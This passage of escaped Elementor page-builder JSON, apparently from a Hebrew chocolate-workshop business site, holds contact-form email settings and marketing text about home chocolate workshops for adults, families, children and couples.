fa-check\",\"library\":\"fa-solid\"},\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocolate4u.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocolate4u.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"\\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e0\\u05e9\\u05dc\\u05d7 \\u05d1\\u05d4\\u05e6\\u05dc\\u05d7\\u05d4.\",\"error_message\":\"\\u05d4\\u05ea\\u05e8\\u05d7\\u05e9\\u05d4 \\u05e9\\u05d2\\u05d9\\u05d0\\u05d4.\",\"required_field_message\":\"\\u05e9\\u05d3\\u05d4 \\u05d6\\u05d4 \\u05d4\\u05d5\\u05d0 \\u05e9\\u05d3\\u05d4 \\u05d7\\u05d5\\u05d1\\u05d4.\",\"invalid_message\":\"\\u05de\\u05e9\\u05d4\\u05d5 \\u05d4\\u05e9\\u05ea\\u05d1\\u05e9. \\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d0\\u05d9\\u05e0\\u05d5 \\u05d7\\u05d5\\u05e7\\u05d9.\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"form\"},{\"id\":\"d555ad1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c65b0d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c6b8474\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"30c64bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05dc\\u05d3, \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05e2\\u05d5\\u05dc\\u05dd\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"56c7701\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05d9\\u05d5\\u05de\\u05d9 \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05de\\u05d4\\u05d8\\u05e2\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e2\\u05dc \\u05d4\\u05dc\\u05e9\\u05d5\\u05df. \\u05d7\\u05dc\\u05e7 \\u05dc\\u05d0 \\u05e7\\u05d8\\u05df \\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05df \\u05d3\\u05d5\\u05d5\\u05e7\\u05d0 \\u05dc\\u05d3\\u05e2\\u05ea \\u05d0\\u05d9\\u05da \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e0\\u05db\\u05d5\\u05e0\\u05d4 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d9\\u05d5\\u05e7\\u05e8\\u05ea\\u05d9 \\u05d4\\u05d6\\u05d4, \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d0\\u05d9\\u05da \\u05d4\\u05db\\u05d9 \\u05e0\\u05db\\u05d5\\u05df \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d5\\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05de\\u05de\\u05e0\\u05d5 \\u05d9\\u05e6\\u05d9\\u05e8\\u05d5\\u05ea \\u05d9\\u05e4\\u05d9\\u05e4\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d2\\u05dd \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05dc\\u05d8\\u05e4\\u05dc \\u05d1\\u05d5 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05de\\u05e0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d9\\u05ea\\u05e8\\u05de\\u05d5 \\u05dc\\u05d8\\u05e2\\u05dd \\u05d4\\u05db\\u05dc\\u05dc\\u05d9 \\u05e9\\u05dc \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05de\\u05d4 \\u05d6\\u05d4 \\u05d0\\u05d5\\u05de\\u05e8?<\\/h2><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d4 \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d0\\u05e6\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea.<br \\/>\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d0\\u05d5\\u05e8\\u05e2, \\u05dc\\u05d0\\u05d5\\u05e4\\u05d9 \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d5\\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e2\\u05e6\\u05de\\u05d4 (\\u05dc\\u05de\\u05e9\\u05dc, \\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d1\\u05d1\\u05d9\\u05ea \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05e2\\u05d5\\u05d3), \\u05d1\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05db\\u05d9\\u05e6\\u05d3 \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05de\\u05e7\\u05e8\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05d5\\u05de\\u05d5\\u05e6\\u05e8\\u05d9 \\u05d4\\u05d0\\u05e4\\u05d9\\u05d4 \\u05e9\\u05d9\\u05e9 \\u05d1\\u05db\\u05dc \\u05d0\\u05e8\\u05d5\\u05df, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05e9\\u05d9\\u05de\\u05d9\\u05dd \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd.<\\/p><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05dc\\u05d0 \\u05e6\\u05e8\\u05d9\\u05da \\u05d4\\u05db\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d5\\u05dc\\u05d0 \\u05ea\\u05d0\\u05dc\\u05e6\\u05d5 \\u05dc\\u05e8\\u05db\\u05d5\\u05e9 \\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05d9\\u05d5\\u05d7\\u05d3.<br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea, \\u05dc\\u05ea\\u05e0\\u05d5\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05dc\\u05de\\u05d9\\u05e7\\u05e1\\u05e8, \\u05dc\\u05de\\u05d8\\u05e8\\u05e4\\u05d4 \\u05d5\\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05dc\\u05de\\u05e7\\u05e8\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e9\\u05d5\\u05d1 \\u05d5\\u05dc\\u05e9\\u05d7\\u05d6\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05dc\\u05d1\\u05d3\\u05db\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd, \\u05dc\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d4\\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd<\\/h2><p>\\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd.<br \\/>\\u05ea\\u05d7\\u05e9\\u05d1\\u05d5 \\u05e2\\u05dc \\u05d6\\u05d4 \\u05e8\\u05d2\\u05e2. \\u05de\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05db\\u05d9\\u05e3, \\u05de\\u05d4\\u05e0\\u05d4 \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05de\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e0\\u05d4 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e9\\u05d0\\u05d5\\u05ea\\u05d5 \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05db\\u05d9\\u05e3 \\u05d5\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e9\\u05de\\u05d7\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd?<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05e6\\u05d1\\u05d5\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d5\\u05ea \\u05d9\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e8\\u05d1\\u05d5\\u05ea \\u05d1\\u05d5\\u05d7\\u05e8\\u05d5\\u05ea \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea \\u05d0\\u05e6\\u05dc\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea.<br \\/>\\u05d9\\u05e9\\u05e0\\u05dd \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05d7\\u05d5\\u05d1\\u05d1\\u05d5\\u05ea \\u05d0\\u05d5\\u05db\\u05dc, \\u05e2\\u05dd \\u05d6\\u05d9\\u05e7\\u05d4 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7 \\u05d5\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5.<\\/p><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05e7\\u05e6\\u05ea \\u05e9\\u05d5\\u05e0\\u05d4 \\u05d5\\u05d0\\u05d7\\u05e8\\u05ea, \\u05d6\\u05de\\u05df \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d9\\u05d5\\u05e6\\u05d0\\u05ea \\u05d3\\u05d5\\u05e4\\u05df, \\u05d5\\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05dc\\u05d0, \\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e9\\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05db\\u05d0\\u05d7\\u05d3, \\u05d5\\u05dc\\u05e9\\u05de\\u05d5\\u05d7 \\u05d1\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05ea\\u05e4\\u05d9\\u05dd \\u05e9\\u05d4\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d2\\u05df \\u05e2\\u05d3\\u05df \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d9\\u05e9 \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7. \\u05d4\\u05dd \\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05dc\\u05e6\\u05d3 \\u05d4\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd, \\u05dc\\u05e9\\u05d7\\u05e7 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d5\\u05de\\u05d0\\u05ea\\u05d2\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05e2\\u05e6\\u05de\\u05d0\\u05d9. \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd. \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05d1\\u05ea \\u05de\\u05e6\\u05d5\\u05d5\\u05d4 \\u05e9\\u05de\\u05ea\\u05e7\\u05e8\\u05d1\\u05ea, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05db\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05dc\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea, \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d1\\u05e0\\u05d9 \\u05d6\\u05d5\\u05d2 \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05d9\\u05d7\\u05d3, \\u05e9\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7, \\u05dc\\u05e4\\u05e0\\u05e7 \\u05d0\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9 \\u05d1\\u05de\\u05d8\\u05e2\\u05de\\u05d9\\u05dd, \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05d0\\u05e8\\u05d5\\u05d7\\u05d5\\u05ea \\u05de\\u05d5\\u05e9\\u05e7\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd, \\u05d5\\u05d3\\u05d0\\u05d9 \\u05d9\\u05de\\u05e6\\u05d0\\u05d5 \\u05e2\\u05e0\\u05d9\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea.<\\/p><p>\\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d1\\u05e0\\u05d5\\u05d9\\u05d4 \\u05db\\u05da \\u05e9\\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05e9\\u05dc\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4, \\u05e2\\u05dc \\u05d4\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05e9\\u05dc\\u05d5 \\u05d5\\u05e2\\u05dc \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d4\\u05d8\\u05e2\\u05dd \\u05d5\\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05d9\\u05dd.<br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05d9\\u05dd \\u05d5\\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2 \\u05e9\\u05ea\\u05dc\\u05de\\u05d3 \\u05d0\\u05d5\\u05ea\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05de\\u05d8\\u05e8\\u05d9\\u05e4\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4, \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05de\\u05d9\\u05e0\\u05d4<\\/h2><p>\\u05d0\\u05d7\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4.<br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e8\\u05d1\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05ea \\u05d4\\u05d9\\u05d5\\u05dd \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05d1\\u05d3\\u05e8\\u05da \\u05e7\\u05e6\\u05ea \\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05d9\\u05d2\\u05e8\\u05ea\\u05d9\\u05ea \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05d4 